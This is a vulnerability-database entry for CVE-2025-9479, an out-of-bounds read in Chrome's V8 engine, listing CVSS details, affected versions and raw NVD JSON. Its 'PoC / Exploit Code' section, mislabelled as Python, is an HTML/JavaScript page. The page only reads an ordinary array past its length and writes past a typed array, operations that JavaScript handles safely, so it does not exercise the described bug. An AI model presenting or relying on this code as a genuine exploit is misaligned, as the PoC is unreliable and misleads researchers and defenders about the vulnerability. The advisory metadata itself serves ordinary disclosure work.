Security Vulnerability Report
中文
CVE-2025-9479 CVSS 4.3 MEDIUM

CVE-2025-9479

Published: 2025-11-14 03:15:57
Last Modified: 2025-11-17 12:18:37

Description

Out of bounds read in V8 in Google Chrome prior to 133.0.6943.141 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Google Chrome < 133.0.6943.141
Chromium-based browsers with V8 < 133.0.6943.141

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-9479 PoC - V8 Out of Bounds Read --> <!DOCTYPE html> <html> <head> <title>CVE-2025-9479 PoC</title> </head> <body> <h1>V8 Out of Bounds Read PoC</h1> <p>This is a demonstration of the V8 out of bounds read vulnerability.</p> <script> // PoC for CVE-2025-9479 // Target: Google Chrome < 133.0.6943.141 // Vulnerability: Out of bounds read in V8 function triggerV8OOB() { try { // Create an array with specific properties const arr = new Array(10); arr[0] = 1.1; arr[1] = 2.2; arr[2] = 3.3; // Attempt to trigger the out of bounds condition // This specific pattern may trigger the vulnerability for (let i = 0; i < 1000; i++) { // Create objects that may confuse V8's type inference const obj = {}; obj.x = i; obj.y = arr; // Access pattern that may trigger OOB read const idx = 15; // Beyond array bounds const value = arr[idx]; // Force JIT compilation if (i % 100 === 0) { console.log('Attempt ' + i + ': value = ' + value); } } console.log('PoC executed. Check for crashes or memory leaks.'); } catch (e) { console.error('Error:', e); } } // Execute the PoC triggerV8OOB(); // Additional trigger attempts function triggerOOBAdvanced() { // More complex patterns that may trigger the vulnerability const buffer = new ArrayBuffer(16); const view = new Uint8Array(buffer); // Attempt to read beyond buffer bounds for (let i = 0; i < 32; i++) { try { view[i] = i; // Force deoptimization and reoptimization if (i === 16) { console.log('Boundary reached'); } } catch (e) { console.log('OOB access detected at index ' + i); } } } triggerOOBAdvanced(); </script> <p>For educational and security research purposes only.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-9479", "sourceIdentifier": "[email protected]", "published": "2025-11-14T03:15:57.017", "lastModified": "2025-11-17T12:18:37.257", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Out of bounds read in V8 in Google Chrome prior to 133.0.6943.141 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "133.0.6943.141", "matchCriteriaId": "4F5127C9-14A1-4F23-8292-04F0846EEB99"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://chromereleases.googleblog.com/2025/02/stable-channel-update-for-desktop_25.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://issues.chromium.org/issues/390743124", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}]}}